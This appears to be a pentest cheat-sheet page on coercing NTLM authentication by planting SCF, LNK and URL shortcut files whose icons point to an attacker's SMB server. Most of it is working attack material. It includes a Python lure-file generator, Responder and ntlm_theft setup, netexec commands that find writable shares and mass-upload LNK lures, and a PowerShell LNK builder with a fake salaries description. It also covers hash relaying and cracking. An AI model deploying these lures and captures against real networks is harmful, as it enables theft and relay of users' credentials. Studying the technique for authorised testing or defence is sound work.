PRIMARY CATEGORY → MITM & COERCED AUTHS • WINDOWS PRIVESC

Shortcut Files

e.g. SCF, LNK, URL and so on

Workflow

Windows File Explorer renders an icon for every file it lists in a directory, and it does so as soon as the folder is opened, without the user clicking anything

For a shortcut file (SCF, LNK, URL) the location of that icon is specified inside the file itself, so whoever writes the file decides where Explorer goes to fetch it

<SNIP>
IconFile=<ICON_FILE_PATH>
<SNIP>

So, if we compromise a principal that has WRITE permissions over an SMB share, we can place a shortcut file in that share whose IconFile points to an SMB server controlled by the attacker, i.e. a UNC path such as \\<ATTACKER_IP>\<SHARE>\<ICON>

When any user browses the share location containing the shortcut file with Windows File Explorer, Explorer opens an SMB session to the attacker's server to request that resource, i.e. the shortcut's IconFile

That server asks for authentication and the victim's Windows client answers automatically with NTLM, in the security context of the browsing user. We receive an incoming authentication that we can either relay to another host (e.g. with ntlmrelayx, which only works against targets that do not require SMB signing) or try to crack offline as a Net-NTLMv2 response. A Net-NTLMv2 response is not an NT hash: it cannot be used for pass-the-hash, only relayed or cracked

Name the shortcut file so that it starts with the @ character: it then sorts to the top of the share listing, so Explorer renders its icon as soon as the folder is opened, even if the user never scrolls down to it
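The lure files the workflow above relies on, as an added example written for these notes (not code from the original page, ntlm_theft or Responder): a Python generator for the SCF and URL variants, with the IconFile field pointing at an attacker SMB server and the @ naming rule applied. The address 10.10.14.5, the share name pwn and the icon name pwn.ico are assumed placeholders; the UNC check at the end guards against the classic mistake of leaving the icon on a local path, which coerces nothing.

```python
"""Generate SCF/URL lure files whose icon lives on an attacker-controlled SMB server.

Added example for these notes; not part of ntlm_theft, Responder or the original page.
Assumed values: attacker IP 10.10.14.5, share 'pwn', icon file 'pwn.ico'.
"""
import os
import re

# Constructed assumptions: the Responder host and a share/icon name on it.
ATTACKER_IP = "10.10.14.5"
ICON_UNC = rf"\\{ATTACKER_IP}\pwn\pwn.ico"   # the resource Explorer will try to fetch


def scf_content(icon_unc: str) -> str:
    """Shell Command File: Explorer reads IconFile while listing the folder."""
    return (
        "[Shell]\r\n"
        "Command=2\r\n"
        f"IconFile={icon_unc}\r\n"
        "[Taskbar]\r\n"
        "Command=ToggleDesktop\r\n"
    )


def url_content(icon_unc: str) -> str:
    """Internet shortcut: IconFile is resolved the same way; the URL itself is never opened."""
    return (
        "[InternetShortcut]\r\n"
        f"URL={icon_unc}\r\n"
        "IconIndex=1\r\n"
        f"IconFile={icon_unc}\r\n"
    )


def lure_filename(stem: str, ext: str) -> str:
    """Prefix the name with '@' so the file sorts to the top of the share listing."""
    name = stem if stem.startswith("@") else "@" + stem
    return f"{name}.{ext}"


def is_unc(path: str) -> bool:
    """True only for \\\\host\\share[\\...]; a local path would coerce no SMB session."""
    return re.fullmatch(r"\\\\[^\\]+\\[^\\]+(\\.*)?", path) is not None


def write_lures(outdir: str, icon_unc: str, stem: str = "pwn") -> list:
    """Write the SCF and URL lures into outdir and return their paths."""
    if not is_unc(icon_unc):
        raise ValueError(f"icon location is not a UNC path: {icon_unc}")
    os.makedirs(outdir, exist_ok=True)
    written = []
    for ext, content in (("scf", scf_content(icon_unc)), ("url", url_content(icon_unc))):
        path = os.path.join(outdir, lure_filename(stem, ext))
        with open(path, "w", newline="") as fh:   # newline="" keeps the CRLF as written
            fh.write(content)
        written.append(path)
    return written


if __name__ == "__main__":
    for p in write_lures("lures", ICON_UNC):
        print("wrote", p)
```

Copy the generated files into the writable share (for instance with smbclient's put) while Responder is listening on the attacker host; the LNK variant is covered by the PowerShell snippet and the netexec slinky module further down.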

Requirements
  • The controlled local/domain user account must have WRITE permissions over a location within an SMB share that other users actually browse
  • Victims must be able to reach the attacker's SMB server on TCP/445 (outbound SMB is frequently blocked at network boundaries, so the attacker host normally has to sit on the internal network)
Abuse
Verifying if the user account has write permissions over the share

Netexec

netexec smb '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>' --shares

Look for WRITE (or READ,WRITE) in the Permissions column of the share listing

SMBMap

smbmap -H '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>'
Setting up an SMB Server to intercept incoming authentications

Setup

git clone https://github.com/lgandx/Responder Responder
cd Responder && python3 -m venv .venv
. .venv/bin/activate && pip3 install -r requirements.txt

Usage

Responder has to bind TCP/445 (and the other services it poisons), so it needs root; run the venv's interpreter under sudo rather than the system python3, otherwise the dependencies installed above are not found

sudo .venv/bin/python3 Responder.py --interface '<NETWORK_INTERFACE>' --verbose

Captured NTLMv2-SSP hashes are printed to the console and also written under logs/ inside the Responder directory
Creating the malicious Shortcut File

It generates multiple types of NTLMv2 hash theft files

Setup

git clone https://github.com/Greenwolf/ntlm_theft NTLMTheft
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install xlsxwriter

Usage

python3 ntlm_theft.py --generate all --server '<ATTACKER_IP>' --filename pwn

It creates a new directory named pwn containing lure files of many types (Office documents, playlists, etc.); the shortcut variants relevant here are the following

  • SCF
  • URL
  • LNK

Rename the file you upload so that it starts with @ (e.g. @pwn.scf) before placing it in the share, so that it sorts to the top of the listing

Netexec

Creation and Upload

The slinky module creates a .LNK file named <NAME>.lnk whose icon location points to the attacker's server and uploads it to every share the account can write to. NAME is the file name of the shortcut, not the attacker's share name; pick one starting with @

netexec smb '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>' -M slinky -o NAME='@pwn' SERVER='<ATTACKER_IP>'

Cleanup

netexec smb '<TARGET>' -u '<USER>' -p '<PASSWD>' -d '<DOMAIN>' -M slinky -o NAME='@pwn' SERVER='<ATTACKER_IP>' CLEANUP=True

Powershell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\@pwn.lnk")        # .LNK creation; the '@' prefix sorts it to the top of the listing
$lnk.TargetPath = "\\<ATTACKER_IP>\pwn\pwn.png"        # .LNK target: a UNC path on the attacker's SMB server
$lnk.WindowStyle = 1
$lnk.IconLocation = "\\<ATTACKER_IP>\pwn\pwn.ico, 0"   # icon on the attacker's server: fetched over SMB when Explorer lists the folder
$lnk.Description = "Salaries-2023."                    # lure text shown in the tooltip
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Copy-Item "C:\@pwn.lnk" -Destination "\\<TARGET>\<SHARE>\@pwn.lnk"   # drop it on the writable share